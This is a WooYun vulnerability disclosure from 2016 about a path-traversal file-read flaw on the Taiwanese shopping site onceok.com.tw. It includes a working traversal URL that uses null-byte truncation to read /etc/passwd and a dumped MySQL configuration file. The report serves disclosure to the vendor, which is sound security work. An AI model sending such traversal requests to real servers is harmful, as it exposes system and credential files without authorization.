当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177488

漏洞标题:万事OK WWW主站任意文件遍历读取漏洞(臺灣地區)

相关厂商:ONCEOK

漏洞作者: 暴走

提交时间:2016-02-22 09:48

修复时间:2016-02-27 09:50

公开时间:2016-02-27 09:50

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-22: 细节已通知厂商并且等待厂商处理中
2016-02-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

在网站上看到的简介: 
名傑國際「萬事OK」為國內知名電子商務公司─安瑟數位之關係企業。安瑟自1998年起即開始電子商務經營,執國內電子購物網站之牛耳,並多次獲獎,深受消費者肯定。為提供消費者一個舒適便利的-禮品-名產 特產購物環境,特成立「萬事OK」網站 (http://www.onceok.com.tw)。有了「萬事OK」,買淡水最道地的魚酥,不用搭捷運跑淡水,購買全台各地名產特產,也不用搭高鐵就讓您輕鬆吃遍全台灣。點一下「萬事OK」,萬事都OK。
  萬事OK有別於其他購物網站只是將商品PO到網路上就開始販售。萬事OK以安瑟八年來經營電子商務的經驗,協助精選出來的全台各地-禮品-名產 特產 之名店將商品及店家資訊等完整 E化,並計劃將全台各地名產特產及無遠弗屆的電子商務平台銷售到全世界去。所以萬事OK是您挑選-禮品-贈品-、伴手禮的最佳選擇。

详细说明:

万事OK主站(http://www.onceok.com.tw/)首页:

1.png

漏洞证明:

经过测试发现存在任意文件读取漏洞。
使用%00截断即可读取系统文件:
http://www.onceok.com.tw/activities.php?ad=../../../../../../../../../etc/passwd%00.jpg

2.png


查看DNS:

3.png


查看下MySQL的配置文件:

4.png


# Example MySQL config file for large systems. # # This is for a large system with memory = 512M where the system runs mainly # MySQL. # # You can copy this file to # /etc/my.cnf to set global options, # mysql-data-dir/my.cnf to set server-specific options (in this # installation this directory is /var/lib/mysql) or # ~/.my.cnf to set user-specific options. # # In this file, you can use all long options that a program supports. # If you want to know which options a program supports, run the program # with the "--help" option. # The following options will be passed to all MySQL clients [client] #password = your_password port	= 3306 socket	= /var/lib/mysql/mysql.sock # Here follows entries for some specific programs # The MySQL server [mysqld] port	= 3306 socket	= /var/lib/mysql/mysql.sock skip-locking key_buffer = 256M max_allowed_packet = 1M table_cache = 384 table_definition_cache = 384 sort_buffer_size = 1M read_buffer_size = 4M read_rnd_buffer_size = 4M myisam_sort_buffer_size = 64M thread_cache_size = 8 query_cache_size= 16M max_connections = 500 max_connect_errors = 10000 wait_timeout = 10 tmp_table_size = 256M max_heap_table_size = 256M # Try number of CPU's*2 for thread_concurrency thread_concurrency = 8 #log-slow-queries = /var/log/mysql-slow.log #long_query_time = 3 #log-long-format #log-slow-queries = /var/log/mysql/mysql-slow.log #long_query_time = 1 skip-innodb # Don't listen on a TCP/IP port at all. This can be a security enhancement, # if all processes that need to connect to mysqld run on the same host. # All interaction with mysqld must be made via Unix sockets or named pipes. # Note that using this option without enabling named pipes on Windows # (via the "enable-named-pipe" option) will render mysqld useless! # #skip-networking # Replication Master Server (default) # binary logging is required for replication log-bin=mysql-bin # required unique id between 1 and 2^32 - 1 # defaults to 1 if master-host is not set # but will not function as a master if omitted server-id	= 1 # Replication Slave (comment out master section to use this) # # To configure this host as a replication slave, you can choose between # two methods : # # 1) Use the CHANGE MASTER TO command (fully described in our manual) - # the syntax is: # # CHANGE MASTER TO MASTER_HOST=, MASTER_PORT=, # MASTER_USER=, MASTER_PASSWORD= ; # # where you replace , , by quoted strings and # by the master's port number (3306 by default). # # Example: # # CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306, # MASTER_USER='joe', MASTER_PASSWORD='secret'; # # OR # # 2) Set the variables below. However, in case you choose this method, then # start replication for the first time (even unsuccessfully, for example # if you mistyped the password in master-password and the slave fails to # connect), the slave will create a master.info file, and any later # change in this file to the variables' values below will be ignored and # overridden by the content of the master.info file, unless you shutdown # the slave server, delete master.info and restart the slaver server. # For that reason, you may want to leave the lines below untouched # (commented) and instead use CHANGE MASTER TO (see above) # # required unique id between 2 and 2^32 - 1 # (and different from the master) # defaults to 2 if master-host is set # but will not function as a slave if omitted #server-id = 2 # # The replication master for this slave - required #master-host = # # The username the slave will use for authentication when connecting # to the master - required #master-user = # # The password the slave will authenticate with when connecting to # the master - required #master-password = # # The port the master is listening on. # optional - defaults to 3306 #master-port = # # binary logging - not required for slaves, but recommended #log-bin=mysql-bin # Point the following paths to different dedicated disks tmpdir	= /tmp/	#log-update = /path-to-dedicated-directory/hostname # Uncomment the following if you are using BDB tables #bdb_cache_size = 64M #bdb_max_lock = 100000 # Uncomment the following if you are using InnoDB tables #innodb_data_home_dir = /var/lib/mysql/ #innodb_data_file_path = ibdata1:10M:autoextend #innodb_log_group_home_dir = /var/lib/mysql/ #innodb_log_arch_dir = /var/lib/mysql/ # You can set .._buffer_pool_size up to 50 - 80 % # of RAM but beware of setting memory usage too high #innodb_buffer_pool_size = 256M #innodb_additional_mem_pool_size = 20M # Set .._log_file_size to 25 % of buffer pool size #innodb_log_file_size = 64M #innodb_log_buffer_size = 8M #innodb_flush_log_at_trx_commit = 1 #innodb_lock_wait_timeout = 50 [mysqldump] quick max_allowed_packet = 16M [mysql] no-auto-rehash # Remove the next comment character if you are not familiar with SQL #safe-updates [isamchk] key_buffer = 128M sort_buffer_size = 128M read_buffer = 2M write_buffer = 2M [myisamchk] key_buffer = 128M sort_buffer_size = 128M read_buffer = 2M write_buffer = 2M [mysqlhotcopy] interactive-timeout #log-slow-queries=/var/log/mysql_slow_log

修复方案:

快快修改。

版权声明:转载请注明来源 暴走@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-27 09:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无